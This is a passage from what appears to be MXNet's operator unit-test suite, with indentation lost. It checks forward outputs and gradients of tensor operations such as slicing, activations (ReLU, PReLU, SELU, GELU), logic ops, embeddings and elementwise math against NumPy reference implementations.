check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
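# With squeeze_axis=True the split axis holds exactly num_outputs elements and is
# removed from every output slice; otherwise the axis is divided into num_outputs
# equally sized parts.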
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_context(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues;
# the analytical checks are still performed on every data type to verify correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues;
# the analytical checks are still performed on every data type to verify correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
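# Fixed SELU constants: alpha and the scale lambda from Klambauer et al.,
# "Self-Normalizing Neural Networks" (2017).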
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
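# The reference functions below follow the tanh approximation of GELU:
# gelu(x) ~= 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x**3)))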
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = 0
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad)
